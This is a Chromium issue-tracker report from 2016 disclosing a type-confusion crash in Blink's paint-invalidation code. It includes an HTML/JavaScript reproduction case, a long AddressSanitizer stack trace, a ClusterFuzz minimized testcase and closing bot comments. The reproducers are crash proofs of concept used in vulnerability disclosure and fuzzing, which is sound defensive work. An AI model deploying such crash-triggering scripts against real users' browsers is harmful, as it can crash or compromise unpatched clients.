Issue metadata
Sign in to add a comment
|
Security: type confusion in blink::PaintInvalidationState::updateForNormalChildren
Reported by
cloudfuz...@gmail.com,
Aug 15 2016
|
||||||||||||||||||
Issue description
VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of chrome due to a type confusion in blink::PaintInvalidationState::updateForNormalChildren
VERSION
Chrome Version: asan-linux-release-411953
Operating System: Linux
REPRODUCTION CASE
<script>
function start() {
o108=document.createElementNS('http://www.w3.org/1999/xhtml','sup');
o189=document.createElementNS('http://www.w3.org/2000/svg','radialGradient');
o189.style.contain='paint';
o108.innerHTML="<svg><style>";
o325=o108.querySelectorAll('*')[0];
o326=o108.querySelectorAll('*')[1];
document.documentElement.appendChild(o325);
o326.before(undefined,o189,undefined);
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
ASAN output:
ASSERTION FAILED: object.isBox()
../../third_party/WebKit/Source/core/layout/LayoutBox.h(1136) : const blink::LayoutBox &blink::toLayoutBox(const blink::LayoutObject &)
1 0xcc93006
....
ASAN:DEADLYSIGNAL
=================================================================
==5810==ERROR: AddressSanitizer: SEGV on unknown address 0x00009f7537dd (pc 0x00000cc9300b bp 0x7ffe024f7b50 sp 0x7ffe024f7aa0 T0)
==5810==The signal is caused by a READ memory access.
#0 0xcc9300a in toLayoutBox third_party/WebKit/Source/core/layout/LayoutBox.h:1136:1
#1 0xcc9300a in blink::PaintInvalidationState::updateForNormalChildren() third_party/WebKit/Source/core/layout/PaintInvalidationState.cpp:317
#2 0xcc91067 in blink::PaintInvalidationState::updateForChildren(blink::PaintInvalidationReason) third_party/WebKit/Source/core/layout/PaintInvalidationState.cpp:268:5
#3 0xcf252e0 in blink::LayoutObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1256:31
#4 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#5 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#6 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#7 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#8 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#9 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#10 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#11 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#12 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#13 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#14 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#15 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#16 0xc422a4a in invalidateTreeIfNeeded third_party/WebKit/Source/core/layout/api/LayoutItem.h:279:25
#17 0xc422a4a in blink::FrameView::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/frame/FrameView.cpp:1121
#18 0xc442835 in blink::FrameView::invalidateTreeIfNeededRecursiveInternal() third_party/WebKit/Source/core/frame/FrameView.cpp:2804:9
#19 0xc43cf4a in blink::FrameView::invalidateTreeIfNeededRecursive() third_party/WebKit/Source/core/frame/FrameView.cpp:2786:5
#20 0xc43b520 in blink::FrameView::updateLifecyclePhasesInternal(blink::DocumentLifecycle::LifecycleState) third_party/WebKit/Source/core/frame/FrameView.cpp:2570:21
#21 0xc9fb544 in blink::PageAnimator::updateAllLifecyclePhases(blink::LocalFrame&) third_party/WebKit/Source/core/page/PageAnimator.cpp:85:11
#22 0xa1a0a50 in blink::WebViewImpl::updateAllLifecyclePhases() third_party/WebKit/Source/web/WebViewImpl.cpp:2017:5
#23 0x7188038 in cc::ProxyMain::BeginMainFrame(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >) cc/trees/proxy_main.cc:203:21
#24 0x71bcfe7 in Invoke<const base::WeakPtr<cc::ProxyMain> &, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > base/bind_internal.h:214:12
#25 0x71bcfe7 in MakeItSo<void (cc::ProxyMain::*const &)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), const base::WeakPtr<cc::ProxyMain> &, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > base/bind_internal.h:303
#26 0x71bcfe7 in void base::internal::Invoker<base::internal::BindState<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >, void ()>::RunImpl<void (cc::ProxyMain::* const&)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > > const&, 0ul, 1ul>(void (cc::ProxyMain::* const&)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > > const&, base::IndexSequence<0ul, 1ul>) base/bind_internal.h:346
#27 0x5909235 in Run base/callback.h:389:12
#28 0x5909235 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#29 0x9ee35d4 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*, blink::scheduler::internal::TaskQueueImpl::Task*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:315:19
#30 0x9edef83 in blink::scheduler::TaskQueueManager::DoWork(base::TimeTicks, bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:218:13
#31 0x5909235 in Run base/callback.h:389:12
#32 0x5909235 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#33 0x575e055 in base::MessageLoop::RunTask(base::PendingTask const&) base/message_loop/message_loop.cc:488:19
#34 0x575ee4f in base::MessageLoop::DeferOrRunPendingTask(base::PendingTask) base/message_loop/message_loop.cc:497:5
#35 0x576048a in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:621:13
#36 0x576a4bd in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:35:31
#37 0x57d5129 in base::RunLoop::Run() base/run_loop.cc:35:10
#38 0x947f0f0 in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:198:23
#39 0x3ec8027 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:343:14
#40 0x3ecc805 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:785:12
#41 0x3eb12bd in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:20:28
#42 0x513402 in main content/shell/app/shell_main.cc:48:10
#43 0x7f9b1fc3282f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV third_party/WebKit/Source/core/layout/LayoutBox.h:1136:1 in toLayoutBox
==5810==ABORTING
,
Aug 15 2016
Thanks for the report! However, it looks like our internal fuzzers found this 2 days ago.
,
Aug 15 2016
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=4884309901312000 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: ASSERT Crash Address: Crash State: object.isBox() blink::PaintInvalidationState::updateForNormalChildren blink::PaintInvalidationState::updateForChildren Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=411529:411875 Minimized Testcase (0.41 Kb): Download: https://cluster-fuzz.appspot.com/download/AMIfv97ksZOsBdY8EvXgw0cAv8dIYELoQrRSjSzl2Lg1hnNcDQRi_Wfd_0fohaUkPCHdt2ITnKFoyK2bgC5KTtA_hFbDjQJkMz9SULWikiJNNMg9NO4LIKem5CV1JzrUYTvZj_CXy9yw1hEZThDP45Litu_uSbd0_w?testcase_id=4884309901312000 <script> o108=document.createElementNS('http://www.w3.org/1999/xhtml','sup'); o189=document.createElementNS('http://www.w3.org/2000/svg','radialGradient'); o189.style.contain='paint'; o108.innerHTML="<svg><style>"; o325=o108.querySelectorAll('*')[0]; o326=o108.querySelectorAll('*')[1]; document.documentElement.appendChild(o325); o326.before(o189); </script> See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
,
Nov 24 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by ClusterFuzz
, Aug 15 2016